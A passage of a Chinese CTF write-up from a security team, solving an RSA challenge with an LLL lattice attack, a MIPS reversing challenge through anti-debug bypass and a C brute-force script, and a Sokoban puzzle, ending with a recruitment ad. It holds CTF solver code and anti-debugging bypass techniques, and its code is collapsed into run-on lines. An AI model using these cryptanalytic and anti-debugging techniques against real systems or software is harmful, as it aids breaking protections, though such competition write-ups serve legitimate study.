200119518252971721448274846235879320362924206656971472493711107677598961463553324277826426691784458674010708635756004550789902368338633272118,20217009574515126619724139485885721324936960849401637840860565569588595992087537454744066905387396266844236387315004915383456736142307523960394594650088663019228826091309049211780607761862663242437656610298243,25534440916970201550118006203706860249111087748000550226680885431006136131742280963090650607632467666558508520152535105122661615376298673454198064361094319699307084117001019115669670029195171047304283891069792,18871869316294018605789169171879572816494092699556970507058691345095743053290043643010965660058888064972257990750611470141816041727746767146945121588515830427165739580791663951175220638901672353681640741068573,20173968537913641339915058056878181363456579537994317562789857397928196160113042659777558550242315788417022891612723148843142958668959046890197219991727894451795438138592005695329607326086644956073759609743066,20601943394990265144021144365970164017319737300436518536503270346147112565303361487668388700369636611354280332841812324530501569200031186584749278453651172121161814207025650519637781007286435981682228528706305,16397528630087028144645213166977866073543422560337716097539091258081008408890966764995645782823950721804205427713461441138000880478364026137452291234097219085473748076681729365744710225699866258812642458184750,21373350333568141000876969785296802670776508778278005158047105058430550665787088265486222905402690421155861103648370249249790560185790723042867282734693553039477436055775198037042047438047898227097749354619822,17767469767416052322357795736899648760868316512079849340028040817353808899589201201338152114229279980849491049574543361275046276135253417685681262008211582060955974064559129311524323185960856955462761555353091,22148352529815091269441663541923247974004854058764556809596705832663604786920964849725772666340437231503146814919702525852955831173047034475925578238466977606367380212886384487294569287202762127531620290162734,21663842528026621741414050256553652815372885707031383713657826718944735177083300302064509342116651731671570591336596953911570477161536730982887182434407761036442993588590230296643001682944654490645815177777455,20219077358929317461660881724990436334639078047412693497584358963241840513748365548465302817975329987854784305275832045889690022909383530837382543579292451297269623663257098458645056099201050578472103957851128,18255302182526662903763852563401346841065939531070045000414364747445988455597258924280193695407035356029557886165605853810182770534711966292253269625917149411889979307227493949293798772727125069093642134972336,24926064145128749429079117171467042019887257504329103038171762786986349157515552927216574990423327013202735544601170247730647598931030432792167867343343213411600516855009788294067588153504026267213013591793027,22369607314724468760253123915374991621544992437057652340350735935680183705467064876346663859696919167243522648029531700630202188671406298533187087292461774927340821192866797400987231509211718089237481902671100,16994227117141934754898145294760231694287000959561775153135582047697469327393472840046006353260694322888486978811557952926229613247229990658445756595259401269267528233642142950389040647504583683489067768144570,21758885458682118428357134100118546351270408335845311063139309657532131159530485845186953650675925931634290182806173575543561250369768935902929861898597396621656214490429009706989779345367262758413050071213624,20156282616031755826700336845313823798147854495428660743884481573484471099887576514309769978525225369254700468742981099548840277532978306665910844928986235042420698332201264764734685502001234369189521332392642,23291765247744127414491614915358658114280269483384022733002965612273627987872443453777028006606037159079637857473229879140366385523633075816362547967658930666106914269093225208138749470566410361196451552322613,19807792217079652175713365065361659318870738952921195173619551645956745050506271953949139230097128034416815169649874760890189515620232505703162831090225715453502422905418824316957257395992121750661389503495033,22074209373194902539215367382758486068533032275912313703269990627206774967653336496619231924013216321042649461711292555464574124714934511202231319963361912937842068483700298097209400217869036338644607607557860,19678336511265998427322297909733474384702243426420286924671444552444079816707773485084891630780465895504253899943221044355971296122774264925882685351095921532685536165514189427245840338009573352081361238596378,24746314790210393213546150322117518542380438001687269872679602687597595933350510598742749840102841364627647151669428936678130556027300886850086220074563664367409218038338623691372433831784916816798993162471163,19346137206512895254202370018555139713690272833895195472766704715282164091959131850520571672509601848193468792313437642997923790118115476212663296111963644011010744006086847599108492279986468255445160241848708,22739514514055088545643169404630736699361136323546717268615404574809011342622362833245601099992039789664042350284789853188040159950619203242924511038681127008964592137006103547262538912024671048254652547084347,21491512279698208400974501713300096639215882495977078132548631606796810881149011161903684894826752520167909538856354238104288201344211604223297924253960199754326239113862002469224042442018978623149685130901455,19381008151938129775129563507607725859173925946797075261437001349051037306091047611533900186593946739906685481456985573476863123716331923469386565432105662324849798182175616351721533048174745501978394238803081,19965143096260141101824772370858657624912960190922708879345774507598595008331705725441057080530773097285721556537121282837594544143441953208783728710383586054502176671726097169651121269564738513585870857829805]
n=73566307488763122580179867626252642940955298748752818919017828624963832700766915409125057515624347299603944790342215380220728964393071261454143348878369192979087090394858108255421841966688982884778999786076287493231499536762158941790933738200959195185310223268630105090119593363464568858268074382723204344819e=65537c =303325902301538095072162987711300589545233321407544419561213050051014340368575924458704998080034922824066586828116710928855922904105703482831223593195541974856247845903155640563419763556155432243733447818138909019162698542426607088151231524406203830357985422758333618201962948143856226136210167718548464912449067773077510925207378520309595658022345214442920360440202890774224295250116442048990578009377300541280465330975931465993745130297479191298485033569345231
V = hints[:4]k = 2 ^ 800M = Matrix.column([k * v for v in V]).augment(Matrix.identity(len(V)))B = [b[1:] for b in M.LLL()]M = (k * Matrix(B[:len(V) - 2])).T.augment(Matrix.identity(len(V)))B = [b[-len(V):] for b in M.LLL() if set(b[:len(V) - 2]) == {0}]for s, t in itertools.product(range(4), repeat=2):T = s B[0] + t B[1]a1, a2, a3, a4 = Tkq = gcd(a1 hints[1] - a2 hints[0], n)if 1 < kq < n:print('find!', kq, s, t)breakfor i in range(2 ** 16, 1, -1):if kq % i == 0:kq //= iq = int(kq)print(q)q = 9067773077510925207378520309595658022345214442920360440202890774224295250116442048990578009377300541280465330975931465993745130297479191298485033569345231
p = int(n // q)phi2=(p2-1)*(q2-1)d = inverse(e, phi2)m2 = pow(enc2,d,n)flag2 = long_to_bytes(m2).decode()enc3 =17737974772490835017139672507261082238806983528533357501033270577311227414618940490226102450232473366793815933753927943027643033829459416623683596533955075569578787574561297243060958714055785089716571943663350360324047532058597960949979894090400134473940587235634842078030727691627400903239810993936770281755
flag3 = long_to_bytes(pow(enc3, d, n)).decode()print(flag1 + flag2 + flag3)操作内容:
这题是真恶心,通过qemu去调试mips_bin可以得到一个假的flag,不过可以过qemu运行的校检,但是如果用他给的emu执行就不对,所以问题就出现在了所给的emu应该是对文件指令进行了篡改
断点达到fork绕过一下这个进程反调试
mips指令集里面pc对应着ip
将ip改到
这里是opcode赋值的地方
之后断点打到提示输出的地方看一下最后check的函数到底是什么
如果前面的值和后面两个异或的总值相当就为0,这是一种check的方法,但是这里只会解出一个fakeflag,我直接红温了
接下来继续分析,猜测是emu会对mips_bin进行篡改
貌似是把emu的debug功能删除了
修复好之后,去动调然后跟踪一下,找到真正的加密处,不过是单字符加密,所以可以爆破
编写exp爆破
提取sbox和key
key = [ 0xDE, 0xAD, 0xBE, 0xEF ]
SBox = [ 0x36, 0x68, 0x32, 0x44, 0x12, 0x61, 0x6f, 0xdf, 0xba, 0xe9, 0x98, 0x28, 0x3d, 0xa8, 0xe6, 0x1e, 0x4d, 0xf2, 0xb1, 0x7e, 0xc2, 0x6a, 0x96, 0x8c, 0x37, 0x19, 0x14, 0x42, 0xa2, 0x11, 0xe5, 0x5b, 0x9d, 0x23, 0x3, 0x83, 0xf8, 0xd8, 0x9, 0x8a, 0x3c, 0x7d, 0x1a, 0x46, 0x49, 0xdc, 0x76, 0x63, 0x3e, 0x4, 0x9a, 0xc, 0x43, 0x4b, 0x72, 0x5f, 0x53, 0x21, 0x74, 0x66, 0x4f, 0xa7, 0xf6, 0x7b, 0x94, 0xa3, 0x47, 0x8f, 0xf4, 0x52, 0x2a, 0x89, 0x30, 0x33, 0x27, 0x2c, 0xf5, 0x75, 0x17, 0x79, 0x5e, 0x7f, 0x9c, 0xcb, 0x55, 0xbb, 0x60, 0x38, 0xb8, 0xd2, 0xd4, 0x8b, 0xbf, 0x1f, 0x41, 0x45, 0x0, 0x82, 0x69, 0x40, 0xe1, 0x9f, 0xe2, 0xd3, 0x4a, 0x1c, 0x71, 0x62, 0x18, 0x24, 0x97, 0x84, 0xa, 0x8e, 0x3f, 0xf, 0x1, 0x86, 0xe, 0x67, 0xc9, 0x99, 0x88, 0xb0, 0x6e, 0x54, 0x92, 0xef, 0x9b, 0xd5, 0xa5, 0xb, 0xdd, 0xbd, 0xae, 0xcc, 0xc8, 0x3a, 0x65, 0x56, 0xe0, 0xf1, 0x6, 0x1b, 0xfa, 0xbc, 0xc4, 0x91, 0xc1, 0x2e, 0x13, 0xf0, 0x58, 0xee, 0xac, 0xec, 0xa6, 0x26, 0x39, 0xb5, 0xaf, 0xc3, 0x10, 0x5a, 0xd, 0x5d, 0x29, 0x15, 0x6b, 0x50, 0xb2, 0xfe, 0xaa, 0x90, 0xa9, 0x51, 0xd0, 0xb6, 0xc6, 0x34, 0xfc, 0xa0, 0xb3, 0x35, 0xea, 0x7, 0xa4, 0x22, 0x80, 0x6d, 0x81, 0x57, 0x87, 0x25, 0xc7, 0x4c, 0xd6, 0xce, 0x77, 0xd7, 0xad, 0x78, 0x7a, 0x85, 0xa1, 0xf3, 0xe8, 0x5c, 0x73, 0x48, 0xda, 0x31, 0x4e, 0x2d, 0x93, 0x16, 0x2, 0x70, 0x1d, 0xfb, 0xcd, 0xe3, 0xf7, 0x64, 0xf9, 0xc5, 0x8, 0x9e, 0x95, 0x2b, 0xe4, 0x20, 0xd1, 0xfd, 0x7c, 0x2f, 0xbe, 0xb9, 0xdb, 0xde, 0xe7, 0xd9, 0x3b, 0xeb, 0xff, 0xb7, 0xca, 0xb4, 0x5, 0xc0, 0xab, 0xcf, 0xed, 0x6c, 0x8d, 0x59 ]
#include <stdio.h>#include <stdlib.h>#include <string.h>unsigned char deadbeef[256] = { 0xDE, 0xAD, 0xBE, 0xEF };char* encrypt(char* input, int xor_value) { unsigned char SBox[256] = { 0x36, 0x68, 0x32, 0x44, 0x12, 0x61, 0x6f, 0xdf, 0xba, 0xe9, 0x98, 0x28, 0x3d, 0xa8, 0xe6, 0x1e, 0x4d, 0xf2, 0xb1, 0x7e, 0xc2, 0x6a, 0x96, 0x8c, 0x37, 0x19, 0x14, 0x42, 0xa2, 0x11, 0xe5, 0x5b, 0x9d, 0x23, 0x3, 0x83, 0xf8, 0xd8, 0x9, 0x8a, 0x3c, 0x7d, 0x1a, 0x46, 0x49, 0xdc, 0x76, 0x63, 0x3e, 0x4, 0x9a, 0xc, 0x43, 0x4b, 0x72, 0x5f, 0x53, 0x21, 0x74, 0x66, 0x4f, 0xa7, 0xf6, 0x7b, 0x94, 0xa3, 0x47, 0x8f, 0xf4, 0x52, 0x2a, 0x89, 0x30, 0x33, 0x27, 0x2c, 0xf5, 0x75, 0x17, 0x79, 0x5e, 0x7f, 0x9c, 0xcb, 0x55, 0xbb, 0x60, 0x38, 0xb8, 0xd2, 0xd4, 0x8b, 0xbf, 0x1f, 0x41, 0x45, 0x0, 0x82, 0x69, 0x40, 0xe1, 0x9f, 0xe2, 0xd3, 0x4a, 0x1c, 0x71, 0x62, 0x18, 0x24, 0x97, 0x84, 0xa, 0x8e, 0x3f, 0xf, 0x1, 0x86, 0xe, 0x67, 0xc9, 0x99, 0x88, 0xb0, 0x6e, 0x54, 0x92, 0xef, 0x9b, 0xd5, 0xa5, 0xb, 0xdd, 0xbd, 0xae, 0xcc, 0xc8, 0x3a, 0x65, 0x56, 0xe0, 0xf1, 0x6, 0x1b, 0xfa, 0xbc, 0xc4, 0x91, 0xc1, 0x2e, 0x13, 0xf0, 0x58, 0xee, 0xac, 0xec, 0xa6, 0x26, 0x39, 0xb5, 0xaf, 0xc3, 0x10, 0x5a, 0xd, 0x5d, 0x29, 0x15, 0x6b, 0x50, 0xb2, 0xfe, 0xaa, 0x90, 0xa9, 0x51, 0xd0, 0xb6, 0xc6, 0x34, 0xfc, 0xa0, 0xb3, 0x35, 0xea, 0x7, 0xa4, 0x22, 0x80, 0x6d, 0x81, 0x57, 0x87, 0x25, 0xc7, 0x4c, 0xd6, 0xce, 0x77, 0xd7, 0xad, 0x78, 0x7a, 0x85, 0xa1, 0xf3, 0xe8, 0x5c, 0x73, 0x48, 0xda, 0x31, 0x4e, 0x2d, 0x93, 0x16, 0x2, 0x70, 0x1d, 0xfb, 0xcd, 0xe3, 0xf7, 0x64, 0xf9, 0xc5, 0x8, 0x9e, 0x95, 0x2b, 0xe4, 0x20, 0xd1, 0xfd, 0x7c, 0x2f, 0xbe, 0xb9, 0xdb, 0xde, 0xe7, 0xd9, 0x3b, 0xeb, 0xff, 0xb7, 0xca, 0xb4, 0x5, 0xc0, 0xab, 0xcf, 0xed, 0x6c, 0x8d, 0x59 }; unsigned char* output = (unsigned char*)malloc(22); unsigned char index1 = 0, index2 = 0; for (int j = 0; j < 21; j++) { unsigned char current_value = SBox[++index1]; index2 += current_value; unsigned char temp_value = SBox[index1]; SBox[index1] = SBox[index2]; SBox[index2] = temp_value; unsigned char shifted_value = ((((((input[j] << 7) | (input[j] >> 1)) << 6) ^ 0x0FFFFFFC0) | ((((input[j] << 7) | (input[j] >> 1)) & 0xff) >> 2) ^ 0x3B) ^ 0x0FFFFFFBE); unsigned char temp = (((shifted_value << 5) | (shifted_value >> 3)) ^ 0xFFFFFFAD) & 0xff; unsigned char intermediate = (((temp << 4) | (temp >> 4)) ^ 0x0FFFFFFDE) & 0xff; unsigned char final_temp = ((intermediate << 3) | (intermediate >> 5)); output[j] = SBox[(SBox[index1] + current_value) & 0xff] ^ deadbeef[j & 3] ^ final_temp; } for (int i = 0; i < 22; i++) { output[i] ^= xor_value; } return output;}int main() { unsigned char input_buffer[30] = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'; unsigned char expected_output[30] = { 0xC4, 0xEE, 0x3C, 0xBB, 0xE7, 0xFD, 0x67, 0x1D, 0xF8, 0x97, 0x68, 0x9D, 0x0B, 0x7F, 0xC7, 0x80, 0xDF, 0xF9, 0x4B, 0xA0, 0x46, 0x91 }; unsigned char temp = expected_output[7]; expected_output[7] = expected_output[11]; expected_output[11] = temp; temp = expected_output[12]; expected_output[12] = expected_output[16]; expected_output[16] = temp; for (int xor_value = 0; xor_value < 256; xor_value++) { for (int i = 0; i < 21; i++) { int found = 0; for (int j = 0; j < 256; j++) { input_buffer[i] = j; unsigned char* encrypted_output = encrypt(input_buffer, xor_value); if (expected_output[i] == encrypted_output[i]) { printf('%c', j); found = 1; break; } free(encrypted_output); } } printf('n'); } free(input_buffer); return 0;}
flag值:
flag{QeMu_r3v3rs3in9_h@ck6}
操作内容:
flag要求
wasd控制方向结合flag要求是推箱子游戏,然后flag要每关的最短路径走向
根据循环数,可以判读出有九关
动调拿到完整地图
写个脚本把地图分出来
最后有几个字母,应该也输入flag内容
走最短路径玩完九关,md5加密一下结合qwb!得到flag
得到flag
qwb!_fec2d316d20dbacbe0cdff8fb6ff07b9
flag值:
qwb!_fec2d316d20dbacbe0cdff8fb6ff07b9
欢迎师傅们加入我们:
ZeroPointZero安全团队纳新群1:553624735
有兴趣的师傅欢迎一起来讨论!
团队纳新简历投递邮箱:[email protected]